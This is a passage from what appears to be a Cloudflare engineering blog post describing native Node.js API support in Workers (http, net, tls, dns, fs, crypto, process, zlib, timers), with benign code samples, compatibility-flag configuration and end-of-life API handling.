  </tr>
  <tr>
    <td><span>node:crypto</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/crypto.html"><span>https://nodejs.org/docs/latest/api/crypto.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:dns</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/dns.html"><span>https://nodejs.org/docs/latest/api/dns.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:fs</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/fs.html"><span>https://nodejs.org/docs/latest/api/fs.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:http</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/http.html"><span>https://nodejs.org/docs/latest/api/http.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:https</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/https.html"><span>https://nodejs.org/docs/latest/api/https.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:net</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/net.html"><span>https://nodejs.org/docs/latest/api/net.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:process</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/process.html"><span>https://nodejs.org/docs/latest/api/process.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:timers</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/timers.html"><span>https://nodejs.org/docs/latest/api/timers.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:tls</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/tls.html"><span>https://nodejs.org/docs/latest/api/tls.html</span></a><span> </span></td>
  </tr>
  <tr>
    <td><span>node:zlib</span></td>
    <td><a href="https://nodejs.org/docs/latest/api/zlib.html"><span>https://nodejs.org/docs/latest/api/zlib.html</span></a><span> </span></td>
  </tr>
</tbody></table></div><p>Each of these has been carefully implemented to approximate Node.js' behavior as closely as possible where feasible. Where matching <a href="http://nodejs.org"><u>Node.js</u></a>' behavior is not possible, our implementations will throw a clear error when called, rather than silently failing or not being present at all. This ensures that packages that check for the presence of these APIs will not break, even if the functionality is not available.</p><p>In some cases, we had to implement entirely new capabilities within the runtime in order to provide the necessary functionality. For <code>node:fs</code>, we added a new virtual file system within the Workers environment. In other cases, such as with <code>node:net</code>, <code>node:tls</code>, and <code>node:http</code>, we wrapped the new Node.js APIs around existing Workers capabilities such as the <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>Sockets API</u></a> and <a href="https://developers.cloudflare.com/workers/runtime-apis/fetch/"><code><u>fetch</u></code></a>.</p><p>Most importantly, <b>all of these implementations are done natively in the Workers runtime</b>, using a combination of TypeScript and C++. Whereas our earlier Node.js compatibility efforts relied heavily on polyfills and shims injected at deployment time by developer tooling such as <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>, we are moving towards a model where future Workers will have these APIs available natively, without need for any additional dependencies. This not only improves performance and reduces memory usage, but also ensures that the behavior is as close to Node.js as possible.</p>
    <div>
      <h2>The networking stack</h2>
      <a href="#the-networking-stack">
        
      </a>
    </div>
    <p>Node.js has a rich set of networking APIs that allow applications to create servers, make HTTP requests, work with raw TCP and UDP sockets, send DNS queries, and more. Workers do not have direct access to raw kernel-level sockets though, so how can we support these Node.js APIs so packages still work as intended? We decided to build on top of the existing <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>managed Sockets</u></a> and fetch APIs. These implementations allow many popular Node.js packages that rely on networking APIs to work seamlessly in the Workers environment.</p><p>Let's start with the HTTP APIs.</p>
    <div>
      <h3>HTTP client and server support</h3>
      <a href="#http-client-and-server-support">
        
      </a>
    </div>
    <p>From the moment we announced that we would be pursuing Node.js compatibility within Workers, users have been asking specifically for an implementation of the <code>node:http</code> module. There are countless modules in the ecosystem that depend directly on APIs like <code>http.get(...)</code> and <code>http.createServer(...)</code>.</p><p>The <code>node:http</code> and <code>node:https</code> modules provide APIs for creating HTTP clients and servers. <a href="https://blog.cloudflare.com/bringing-node-js-http-servers-to-cloudflare-workers/"><u>We have implemented both</u></a>, allowing you to create HTTP clients using <code>http.request()</code> and servers using <code>http.createServer()</code>. <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/http/"><u>The HTTP client implementation</u></a> is built on top of the Fetch API, while the HTTP server implementation is built on top of the Workers runtime’s existing request handling capabilities.</p><p>The client side is fairly straightforward:</p>
            <pre><code>import http from 'node:http';

export default {
  async fetch(request) {
    return new Promise((resolve, reject) =&gt; {
      const req = http.request('http://example.com', (res) =&gt; {
        let data = '';
        res.setEncoding('utf8');
        res.on('data', (chunk) =&gt; {
          data += chunk;
        });
        res.on('end', () =&gt; {
          resolve(new Response(data));
        });
      });
      req.on('error', (err) =&gt; {
        reject(err);
      });
      req.end();
    });
  }
}
</code></pre>
            <p>The server side is just as simple but likely even more exciting. We've often been asked about the possibility of supporting <a href="https://expressjs.com/"><u>Express</u></a>, or <a href="https://koajs.com/"><u>Koa</u></a>, or <a href="https://fastify.dev/"><u>Fastify</u></a> within Workers, but it was difficult to do because these were so dependent on the Node.js APIs. With the new additions it is now possible to use both Express and Koa within Workers, and we're hoping to be able to add Fastify support later. </p>
            <pre><code>import { createServer } from "node:http";
import { httpServerHandler } from "cloudflare:node";

const server = createServer((req, res) =&gt; {
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.end("Hello from Node.js HTTP server!");
});

export default httpServerHandler(server);
</code></pre>
            <p>The <code>httpServerHandler()</code> function from the <code>cloudflare:nod</code>e module integrates the HTTP <code>server</code> with the Workers fetch event, allowing it to handle incoming requests.</p>
    <div>
      <h3>The <code>node:dns</code> module</h3>
      <a href="#the-node-dns-module">
        
      </a>
    </div>
    <p>The <code>node:dns</code> module provides an API for performing DNS queries. </p><p>At Cloudflare, we happen to have a <a href="https://developers.cloudflare.com/1.1.1.1/encryption/dns-over-https/"><u>DNS-over-HTTPS (DoH)</u></a> service and our own <a href="https://one.one.one.one/"><u>DNS service called 1.1.1.1</u></a>. We took advantage of this when exposing <code>node:dns</code> in Workers. When you use this module to perform a query, it will just make a subrequest to 1.1.1.1 to resolve the query. This way the user doesn’t have to think about DNS servers, and the query will just work.</p>
    <div>
      <h3>The <code>node:net</code> and <code>node:tls</code> modules</h3>
      <a href="#the-node-net-and-node-tls-modules">
        
      </a>
    </div>
    <p>The <code>node:net</code> module provides an API for creating TCP sockets, while the <code>node:tls</code> module provides an API for creating secure TLS sockets. As we mentioned before, both are built on top of the existing <a href="https://developers.cloudflare.com/workers/runtime-apis/tcp-sockets/"><u>Workers Sockets API</u></a>. Note that not all features of the <code>node:net</code> and <code>node:tls</code> modules are available in Workers. For instance, it is not yet possible to create a TCP server using <code>net.createServer()</code> yet (but maybe soon!), but we have implemented enough of the APIs to allow many popular packages that rely on these modules to work in Workers.</p>
            <pre><code>import net from 'node:net';
import tls from 'node:tls';

export default {
  async fetch(request) {
    const { promise, resolve } = Promise.withResolvers();
    const socket = net.connect({ host: 'example.com', port: 80 },
        () =&gt; {
      let buf = '';
      socket.setEncoding('utf8')
      socket.on('data', (chunk) =&gt; buf += chunk);
      socket.on('end', () =&gt; resolve(new Response('ok'));
      socket.end();
    });
    return promise;
  }
}
</code></pre>
            
    <div>
      <h2>A new virtual file system and the <code>node:fs</code> module</h2>
      <a href="#a-new-virtual-file-system-and-the-node-fs-module">
        
      </a>
    </div>
    <p>What does supporting filesystem APIs mean in a serverless environment? When you deploy a Worker, it runs in Region:Earth and we don’t want you needing to think about individual servers with individual file systems. There are, however, countless existing applications and modules in the ecosystem that leverage the file system to store configuration data, read and write temporary data, and more.</p><p>Workers do not have access to a traditional file system like a Node.js process does, and for good reason! A Worker does not run on a single machine; a single request to one worker can run on any one of thousands of servers anywhere in Cloudflare's global <a href="https://www.cloudflare.com/network"><u>network</u></a>. Coordinating and synchronizing access to shared physical resources such as a traditional file system harbor major technical challenges and risks of deadlocks and more; challenges that are inherent in any massively distributed system. Fortunately, Workers provide powerful tools like <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a> that provide a solution for coordinating access to shared, durable state at scale. To address the need for a file system in Workers, we built on what already makes Workers great.</p><p>We implemented a virtual file system that allows you to use the node:fs APIs to read and write temporary, in-memory files. This virtual file system is specific to each Worker. When using a stateless worker, files created in one request are not accessible in any other request. However, when using a Durable Object, this temporary file space can be shared across multiple requests from multiple users. This file system is ephemeral (for now), meaning that files are not persisted across Worker restarts or deployments, so it does not replace the use of the <a href="https://developers.cloudflare.com/durable-objects/api/storage-api/"><u>Durable Object Storage</u></a> mechanism, but it provides a powerful new tool that greatly expands the capabilities of your Durable Objects.</p><p>The <code>node:fs</code> module provides a rich set of APIs for working with files and directories:</p>
            <pre><code>import fs from 'node:fs';

export default {
  async fetch(request) {
    // Write a temporary file
    await fs.promises.writeFile('/tmp/hello.txt', 'Hello, world!');

    // Read the file
    const data = await fs.promises.readFile('/tmp/hello.txt', 'utf-8');

    return new Response(`File contents: ${data}`);
  }
}
</code></pre>
            <p>The virtual file system supports a wide range of file operations, including reading and writing files, creating and removing directories, and working with file descriptors. It also supports standard input/output/error streams via <code>process.stdin</code>, <code>process.stdout</code>, and <code>process.stderr</code>, symbolic links, streams, and more.</p><p>While the current implementation of the virtual file system is in-memory only, we are exploring options for adding persistent storage in the future that would link to existing Cloudflare storage solutions like <a href="https://www.cloudflare.com/developer-platform/products/r2/">R2</a> or Durable Objects. But you don't have to wait on us! When combined with powerful tools like Durable Objects and <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>JavaScript RPC</u></a>, it's certainly possible to create your own general purpose, durable file system abstraction backed by sqlite storage.</p>
    <div>
      <h2>Cryptography with <code>node:crypto</code></h2>
      <a href="#cryptography-with-node-crypto">
        
      </a>
    </div>
    <p>The <code>node:crypto</code> module provides a comprehensive set of cryptographic functionality, including hashing, encryption, decryption, and more. We have implemented a full version of the <code>node:crypto</code> module, allowing you to use familiar cryptographic APIs in your Workers applications. There will be some difference in behavior compared to Node.js due to the fact that Workers uses <a href="https://github.com/google/boringssl/blob/main/README.md"><u>BoringSSL</u></a> under the hood, while Node.js uses <a href="https://github.com/openssl"><u>OpenSSL</u></a>. However, we have strived to make the APIs as compatible as possible, and many popular packages that rely on <code>node:crypto</code> now work seamlessly in Workers.</p><p>To accomplish this, we didn't just copy the implementation of these cryptographic operations from Node.js. Rather, we worked within the Node.js project to extract the core crypto functionality out into a separate dependency project called <a href="https://github.com/nodejs/ncrypto"><code><u>ncrypto</u></code></a> that is used – not only by Workers but Bun as well – to implement Node.js compatible functionality by simply running the exact same code that Node.js is running.</p>
            <pre><code>import crypto from 'node:crypto';

export default {
  async fetch(request) {
    const hash = crypto.createHash('sha256');
    hash.update('Hello, world!');
    const digest = hash.digest('hex');

    return new Response(`SHA-256 hash: ${digest}`);
  }
}
</code></pre>
            <p>All major capabilities of the <code>node:crypto</code> module are supported, including:</p><ul><li><p>Hashing (e.g., SHA-256, SHA-512)</p></li><li><p>HMAC</p></li><li><p>Symmetric encryption/decryption</p></li><li><p>Asymmetric encryption/decryption</p></li><li><p>Digital signatures</p></li><li><p>Key generation and management</p></li><li><p>Random byte generation</p></li><li><p>Key derivation functions (e.g., PBKDF2, scrypt)</p></li><li><p>Cipher and Decipher streams</p></li><li><p>Sign and Verify streams</p></li><li><p>KeyObject class for managing keys</p></li><li><p>Certificate handling (e.g., X.509 certificates)</p></li><li><p>Support for various encoding formats (e.g., PEM, DER, base64)</p></li><li><p>and more…</p></li></ul>
    <div>
      <h2>Process &amp; Environment</h2>
      <a href="#process-environment">
        
      </a>
    </div>
    <p>In Node.js, the <code>node:process</code> module provides a global object that gives information about, and control over, the current Node.js process. It includes properties and methods for accessing environment variables, command-line arguments, the current working directory, and more. It is one of the most fundamental modules in Node.js, and many packages rely on it for basic functionality and simply assume its presence. There are, however, some aspects of the <code>node:process</code> module that do not make sense in the Workers environment, such as process IDs and user/group IDs which are tied to the operating system and process model of a traditional server environment and have no equivalent in the Workers environment.</p><p>When <code>nodejs_compat</code> is enabled, the <code>process</code> global will be available in your Worker scripts or you can import it directly via <code>import process from 'node:process'</code>. Note that the <code>process</code> global is only available when the <code>nodejs_compat</code> flag is enabled. If you try to access <code>process</code> without the flag, it will be <code>undefined</code> and the import will throw an error.</p><p>Let's take a look at the <code>process</code> APIs that do make sense in Workers, and that have been fully implemented, starting with <code>process.env</code>.</p>
    <div>
      <h3>Environment variables</h3>
      <a href="#environment-variables">
        
      </a>
    </div>
    <p>Workers have had <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>support for environment variables</u></a> for a while now, but previously they were only accessible via the env argument passed to the Worker function. Accessing the environment at the top-level of a Worker was not possible:</p>
            <pre><code>export default {
  async fetch(request, env) {
    const config = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}
</code></pre>
            <p> With the <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><code><u>new process.env</u></code><u> implementation</u></a>, you can now access environment variables in a more familiar way, just like in Node.js, and at any scope, including the top-level of your Worker:</p>
            <pre><code>import process from 'node:process';
const config = process.env.MY_ENVIRONMENT_VARIABLE;

export default {
  async fetch(request, env) {
    // You can still access env here if you need to
    const configFromEnv = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}
</code></pre>
            <p><a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>Environment variables</u></a> are set in the same way as before, via the <code>wrangler.toml</code> or <code>wrangler.jsonc</code> configuration file, or via the Cloudflare dashboard or API. They may be set as simple key-value pairs or as JSON objects:</p>
            <pre><code>{
  "name": "my-worker-dev",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    "nodejs_compat"
  ],
  "vars": {
    "API_HOST": "example.com",
    "API_ACCOUNT_ID": "example_user",
    "SERVICE_X_DATA": {
      "URL": "service-x-api.dev.example",
      "MY_ID": 123
    }
  }
}
</code></pre>
            <p>When accessed via <code>process.env</code>, all environment variable values are strings, just like in Node.js.</p><p>Because <code>process.env</code> is accessible at the global scope, it is important to note that environment variables are accessible from anywhere in your Worker script, including third-party libraries that you may be using. This is consistent with Node.js behavior, but it is something to be aware of from a security and configuration management perspective. The <a href="https://developers.cloudflare.com/secrets-store/"><u>Cloudflare Secrets Store</u></a> can provide enhanced handling around secrets within Workers as an alternative to using environment variables.</p>
    <div>
      <h4>Importable environment and waitUntil</h4>
      <a href="#importable-environment-and-waituntil">
        
      </a>
    </div>
    <p>When not using the <code>nodejs_compat</code> flag, we decided to go a step further and make it possible to import both the environment, and the <a href="https://developers.cloudflare.com/workers/configuration/environment-variables/"><u>waitUntil mechanism</u></a>, as a module, rather than forcing users to always access it via the <code>env</code> and <code>ctx</code> arguments passed to the Worker function. This can make it easier to access the environment in a more modular way, and can help to avoid passing the <code>env</code> argument through multiple layers of function calls. This is not a Node.js-compatibility feature, but we believe it is a useful addition to the Workers environment:</p>
            <pre><code>import { env, waitUntil } from 'cloudflare:workers';

const config = env.MY_ENVIRONMENT_VARIABLE;

export default {
  async fetch(request) {
    // You can still access env here if you need to
    const configFromEnv = env.MY_ENVIRONMENT_VARIABLE;
    // ...
  }
}

function doSomething() {
  // Bindings and waitUntil can now be accessed without
  // passing the env and ctx through every function call.
  waitUntil(env.RPC.doSomethingRemote());
}
</code></pre>
            <p>One important note about <code>process.env</code>: changes to environment variables via <code>process.env</code> will not be reflected in the <code>env</code> argument passed to the Worker function, and vice versa. The <code>process.env</code> is populated at the start of the Worker execution and is not updated dynamically. This is consistent with Node.js behavior, where changes to <code>process.env</code> do not affect the actual environment variables of the running process. We did this to minimize the risk that a third-party library, originally meant to run in Node.js, could inadvertently modify the environment assumed by the rest of the Worker code.</p>
    <div>
      <h3>Stdin, stdout, stderr</h3>
      <a href="#stdin-stdout-stderr">
        
      </a>
    </div>
    <p>Workers do not have a traditional standard input/output/error streams like a Node.js process does. However, we have implemented <code>process.stdin</code>, <code>process.stdout</code>, and <code>process.stderr</code> as stream-like objects that can be used similarly. These streams are not connected to any actual process stdin and stdout, but they can be used to capture output that is written to the logs captured by the Worker in the same way as <code>console.log</code> and friends, just like them, they will show up in <a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs/"><u>Workers Logs</u></a>.</p><p>The <code>process.stdout</code> and <code>process.stderr</code> are Node.js writable streams:</p>
            <pre><code>import process from 'node:process';

export default {
  async fetch(request) {
    process.stdout.write('This will appear in the Worker logs\n');
    process.stderr.write('This will also appear in the Worker logs\n');
    return new Response('Hello, world!');
  }
}
</code></pre>
            <p>Support for <code>stdin</code>, <code>stdout</code>, and <code>stderr</code> is also integrated with the virtual file system, allowing you to write to the standard file descriptors <code>0</code>, <code>1</code>, and <code>2</code> (representing <code>stdin</code>, <code>stdout</code>, and <code>stderr</code> respectively) using the <code>node:fs</code> APIs:</p>
            <pre><code>import fs from 'node:fs';
import process from 'node:process';

export default {
  async fetch(request) {
    // Write to stdout
    fs.writeSync(process.stdout.fd, 'Hello, stdout!\n');
    // Write to stderr
    fs.writeSync(process.stderr.fd, 'Hello, stderr!\n');

    return new Response('Check the logs for stdout and stderr output!');
  }
}
</code></pre>
            
    <div>
      <h3>Other process APIs</h3>
      <a href="#other-process-apis">
        
      </a>
    </div>
    <p>We cannot cover every <code>node:process</code> API in detail here, but here are some of the other notable APIs that we have implemented:</p><ul><li><p><code>process.nextTick(fn)</code>: Schedules a callback to be invoked after the current execution context completes. Our implementation uses the same microtask queue as promises so that it behaves exactly the same as <code>queueMicrotask(fn)</code>.</p></li><li><p><code>process.cwd()</code> and <code>process.chdir()</code>: Get and change the current virtual working directory. The current working directory is initialized to /<code>bundle</code> when the Worker starts, and every request has its own isolated view of the current working directory. Changing the working directory in one request does not affect the working directory in other requests.</p></li><li><p><code>process.exit()</code>: Immediately terminates the current Worker request execution. This is unlike Node.js where <code>process.exit()</code> terminates the entire process. In Workers, calling <code>process.exit()</code> will stop execution of the current request and return an error response to the client.</p></li></ul>
    <div>
      <h2>Compression with <code>node:zlib</code></h2>
      <a href="#compression-with-node-zlib">
        
      </a>
    </div>
    <p>The <code>node:zlib</code> module provides APIs for compressing and decompressing data using various algorithms such as gzip, deflate, and brotli. We have implemented the <code>node:zlib</code> module, allowing you to use familiar compression APIs in your Workers applications. This enables a wide range of use cases, including data compression for network transmission, response optimization, and archive handling.</p>
            <pre><code>import zlib from 'node:zlib';

export default {
  async fetch(request) {
    const input = 'Hello, world! Hello, world! Hello, world!';
    const compressed = zlib.gzipSync(input);
    const decompressed = zlib.gunzipSync(compressed).toString('utf-8');

    return new Response(`Decompressed data: ${decompressed}`);
  }
}
</code></pre>
            <p>While Workers has had built-in support for gzip and deflate compression via the <a href="https://compression.spec.whatwg.org/"><u>Web Platform Standard Compression API</u></a>, the <code>node:zlib</code> module support brings additional support for the Brotli compression algorithm, as well as a more familiar API for Node.js developers.</p>
    <div>
      <h2>Timing &amp; scheduling</h2>
      <a href="#timing-scheduling">
        
      </a>
    </div>
    <p>Node.js provides a set of timing and scheduling APIs via the <code>node:timers</code> module. We have implemented these in the runtime as well.</p>
            <pre><code>import timers from 'node:timers';

export default {
  async fetch(request) {
    timers.setInterval(() =&gt; {
      console.log('This will log every half-second');
    }, 500);

    timers.setImmediate(() =&gt; {
      console.log('This will log immediately after the current event loop');
    });

    return new Promise((resolve) =&gt; {
      timers.setTimeout(() =&gt; {
        resolve(new Response('Hello after 1 second!'));
      }, 1000);
    });
  }
}
</code></pre>
            <p>The Node.js implementations of the timers APIs are very similar to the standard Web Platform with one key difference: the Node.js timers APIs return <code>Timeout</code> objects that can be used to manage the timers after they have been created. We have implemented the <code>Timeout</code> class in Workers to provide this functionality, allowing you to clear or re-fire timers as needed.</p>
    <div>
      <h2>Console</h2>
      <a href="#console">
        
      </a>
    </div>
    <p>The <code>node:console</code> module provides a set of console logging APIs that are similar to the standard <code>console</code> global, but with some additional features. We have implemented the <code>node:console</code> module as a thin wrapper around the existing <code>globalThis.console</code> that is already available in Workers.</p>
    <div>
      <h2>How to enable the Node.js compatibility features</h2>
      <a href="#how-to-enable-the-node-js-compatibility-features">
        
      </a>
    </div>
    <p>To enable the Node.js compatibility features as a whole within your Workers, you can set the <code>nodejs_compat</code> <a href="https://developers.cloudflare.com/workers/configuration/compatibility-flags/"><u>compatibility flag</u></a> in your <a href="https://developers.cloudflare.com/workers/wrangler/configuration/"><code><u>wrangler.jsonc or wrangler.toml</u></code></a> configuration file. If you are not using Wrangler, you can also set the flag via the <a href="https://dash.cloudflare.com"><u>Cloudflare dashboard</u></a> or API:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-21",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
  ]
}
</code></pre>
            <p><b>The compatibility date here is key! Update that to the most current date, and you'll always be able to take advantage of the latest and greatest features.</b></p><p>The <code>nodejs_compat</code> flag is an umbrella flag that enables all the Node.js compatibility features at once. This is the recommended way to enable Node.js compatibility, as it ensures that all features are available and work together seamlessly. However, if you prefer, you can also enable or disable some features individually via their own compatibility flags:</p>
<div><table><thead>
  <tr>
    <th><span>Module</span></th>
    <th><span>Enable Flag (default)</span></th>
    <th><span>Disable Flag</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>node:console</span></td>
    <td><span>enable_nodejs_console_module</span></td>
    <td><span>disable_nodejs_console_module</span></td>
  </tr>
  <tr>
    <td><span>node:fs</span></td>
    <td><span>enable_nodejs_fs_module</span></td>
    <td><span>disable_nodejs_fs_module</span></td>
  </tr>
  <tr>
    <td><span>node:http (client)</span></td>
    <td><span>enable_nodejs_http_modules</span></td>
    <td><span>disable_nodejs_http_modules</span></td>
  </tr>
  <tr>
    <td><span>node:http (server)</span></td>
    <td><span>enable_nodejs_http_server_modules</span></td>
    <td><span>disable_nodejs_http_server_modules</span></td>
  </tr>
  <tr>
    <td><span>node:os</span></td>
    <td><span>enable_nodejs_os_module</span></td>
    <td><span>disable_nodejs_os_module</span></td>
  </tr>
  <tr>
    <td><span>node:process</span></td>
    <td><span>enable_nodejs_process_v2</span></td>
    <td></td>
  </tr>
  <tr>
    <td><span>node:zlib</span></td>
    <td><span>nodejs_zlib</span></td>
    <td><span>no_nodejs_zlib</span></td>
  </tr>
  <tr>
    <td><span>process.env</span></td>
    <td><span>nodejs_compat_populate_process_env</span></td>
    <td><span>nodejs_compat_do_not_populate_process_env</span></td>
  </tr>
</tbody></table></div><p>By separating these features, you can have more granular control over which Node.js APIs are available in your Workers. At first, we had started rolling out these features under the one <code>nodejs_compat</code> flag, but we quickly realized that some users perform feature detection based on the presence of certain modules and APIs and that by enabling everything all at once we were risking breaking some existing Workers. Users who are checking for the existence of these APIs manually can ensure new changes don’t break their workers by opting out of specific APIs:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
    // But disable the `node:zlib` module if necessary
    "no_nodejs_zlib",
  ]
}
</code></pre>
            <p>But, to keep things simple, <b>we recommend starting with the </b><code><b>nodejs_compat</b></code><b> flag, which will enable everything. You can always disable individual features later if needed.</b> There is no performance penalty to having the additional features enabled.</p>
    <div>
      <h3>Handling end-of-life'd APIs</h3>
      <a href="#handling-end-of-lifed-apis">
        
      </a>
    </div>
    <p>One important difference between Node.js and Workers is that Node.js has a <a href="https://nodejs.org/en/eol"><u>defined long term support (LTS) schedule</u></a> that allows it to make breaking changes at certain points in time. More specifically, Node.js can remove APIs and features when they reach end-of-life (EOL). On Workers, however, we have a rule that once a Worker is deployed, <a href="https://blog.cloudflare.com/backwards-compatibility-in-cloudflare-workers/"><u>it will continue to run as-is indefinitely</u></a>, without any breaking changes as long as the compatibility date does not change. This means that we cannot simply remove APIs when they reach EOL in Node.js, since this would break existing Workers. To address this, we have introduced a new set of compatibility flags that allow users to specify that they do not want the <code>nodejs_compat</code> features to include end-of-life APIs. These flags are based on the Node.js major version in which the APIs were removed:</p><p>The <code>remove_nodejs_compat_eol</code> flag will remove all APIs that have reached EOL up to your current compatibility date:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
    // Remove Node.js APIs that have reached EOL up to your
    // current compatibility date
    "remove_nodejs_compat_eol",
  ]
}
</code></pre>
            <ul><li><p>The <code>remove_nodejs_compat_eol_v22</code> flag will remove all APIs that reached EOL in Node.js v22. When using r<code>emovenodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v22's EOL date (April 30, 2027).</p></li><li><p>The <code>remove_nodejs_compat_eol_v23</code> flag will remove all APIs that reached EOL in Node.js v23. When using r<code>emovenodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v24's EOL date (April 30, 2028).</p></li><li><p>The <code>remove_nodejs_compat_eol_v24</code> flag will remove all APIs that reached EOL in Node.js v24. When using <code>removenodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v24's EOL date (April 30, 2028).</p></li></ul><p>If you look at the date for <code>remove_nodejs_compat_eol_v23</code> you'll notice that it is the same as the date for <code>remove_nodejs_compat_eol_v24</code>. That is not a typo! Node.js v23 is not an LTS release, and as such it has a very short support window. It was released in October 2023 and reached EOL in May 2024. Accordingly, we have decided to group the end-of-life handling of non-LTS releases into the next LTS release. This means that when you set your compatibility date to a date after the EOL date for Node.js v24, you will also be opting out of the APIs that reached EOL in Node.js v23. Importantly, these flags will not be automatically enabled until your compatibility date is set to a date after the relevant Node.js version's EOL date, ensuring that existing Workers will have plenty of time to migrate before any APIs are removed, or can choose to just simply keep using the older APIs indefinitely by using the reverse compatibility flags like <code>add_nodejs_compat_eol_v24</code>.</p>
    <div>
      <h2>Giving back</h2>
      <a href="#giving-back">
        
      </a>
    </div>
    <p>One other important bit of work that we have been doing is expanding Cloudflare's investment back into the Node.js ecosystem as a whole. There are now five members of the Workers runtime team (plus one summer intern) that are actively contributing to the <a href="https://github.com/nodejs/node"><u>Node.js project</u></a> on GitHub, two of which are members of Node.js' Technical Steering Committee. While we have made a number of new feature contributions such as an implementation of the Web Platform Standard <a href="https://blog.cloudflare.com/improving-web-standards-urlpattern/"><u>URLPattern</u></a> API and improved implementation of <a href="https://github.com/nodejs/ncrypto"><u>crypto</u></a> operations, our primary focus has been on improving the ability for other runtimes to interoperate and be compatible with Node.js, fixing critical bugs, and improving performance. As we continue to grow our efforts around Node.js compatibility we will also grow our contributions back to the project and ecosystem as a whole.</p>
<div><table><thead>
  <tr>
    <th><span>Aaron Snell</span></th>
    <th><span>2025 Summer Intern, Cloudflare Containers</span><br /><span>Node.js Web Infrastructure Team</span></th>
    <th><img src="https://images.ctfassets.net/zkvhlag99gkb/2ud1DF6HOI3ha2ySAhPOve/803132cf224695a48698afb806bf147b/Aaron.png?h=250" /></th>
  </tr>
  <tr>
    <th><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></th>
    <th><a href="https://github.com/flakey5"><span>flakey5</span></a></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>Dario Piotrowicz</span></td>
    <td><span>Senior System Engineer</span><br /><span>Node.js Collaborator</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4K17bsjek1z4u2KRTtZ8uS/d7058dea515cb057a1727bcd01a0f5d2/Dario.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/dario-piotrowicz"><span>dario-piotrowicz</span></a></td>
  </tr>
  <tr>
    <td><span>Guy Bedford</span></td>
    <td><span>Principal Systems Engineer</span><br /><span>Node.js Collaborator</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/iYM8oWWSK89MesmQwctfc/4d86847238b1f10e18717771e2ad5ee8/Guy.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/guybedford"><span>guybedford</span></a></td>
  </tr>
  <tr>
    <td><span>James Snell</span></td>
    <td><span>Principal Systems Engineer</span><br /><span>Node.js TSC</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4vN2YAqsEBlSnWtXRM0pTT/5e9130753ed71933fc94bc2c634425f3/James.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/jasnell"><span>jasnell</span></a></td>
  </tr>
  <tr>
    <td><span>Nicholas Paun</span></td>
    <td><span>Systems Engineer</span><br /><span>Node.js Contributor</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4ePtfLAzk4pKYi4hU4dRLX/e4dcdfe86a4e54c4d02e356e2078d214/Nicholas.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/npaun"><span>npaun</span></a></td>
  </tr>
  <tr>
    <td><span>Yagiz Nizipli</span></td>
